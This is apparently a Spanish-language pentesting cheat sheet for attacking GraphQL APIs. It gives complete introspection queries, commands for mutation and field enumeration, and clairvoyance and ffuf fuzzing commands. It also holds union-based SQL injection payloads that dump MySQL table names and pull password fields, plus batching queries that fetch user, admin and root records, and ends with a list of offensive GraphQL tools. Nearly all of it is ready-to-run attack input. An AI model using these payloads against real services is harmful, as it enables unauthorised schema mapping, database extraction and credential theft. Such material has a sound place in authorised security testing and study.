GraphQL
Checklist
Versiones antiguas
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation
onFragment
onField
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
Versiones modernas
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
Obtener mutaciones (mutations)
query {
__schema {
mutationType {
name
fields {
name
args {
name
defaultValue
type {
...TypeRef
}
}
}
}
}
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
Consultar campos (input fields) de un objeto
{
__type(name: "<object-name>") {
name
inputFields {
name
description
defaultValue
}
}
}
# GraphQL suggestions
clairvoyance -H "<header>: <value>" -c 1 -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
# Fuzzing queries
ffuf -u http://<target>/graphql -w <wordlist.txt>:FUZZ -X POST -d "{\"query\":\"query {FUZZ}\"}" -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -c -mc all -fr "Cannot query" -o ffuf-fuzzing-graphql-queries.html -of html
# Union-based SQLi
{"query": "{user(username: \"x' UNION SELECT 1,2,3,4-- -\"){id,name,password}}"}
## MySQL / MariaDB
{"query": "{user(username: \"x' UNION SELECT 1,2,GROUP_CONCAT(table_name),4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -\"){id,name,password}}"}
# JSON list based batching
[
{"query":"{user(username: \"user\") {id,name,password}}"},
{"query":"{user(username: \"admin\") {id,name,password}}"},
{"query":"{user(username: \"root\") {id,name,password}}"}
]
# Query name based batching
{"query":"{
first: user(username:\"user\"){id,name,password}
second: user(username:\"admin\") {id,name,password}
third: user(username:\"root\") {id,name,password}
}"}
Herramientas
Clairvoyance
clairvoyance -H "<header>: <value>" -c <concurrent-requests> -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
graphw00f
main.py -d -f -t <target>
GraphQL Cop
graphql-cop.py -t <target>/graphql
GraphQLmap
graphqlmap.py -u <target>/graphql
InQL
GraphQL Voyager
Altair GraphQL Client
Wordlists
Última actualización
¿Te fue útil?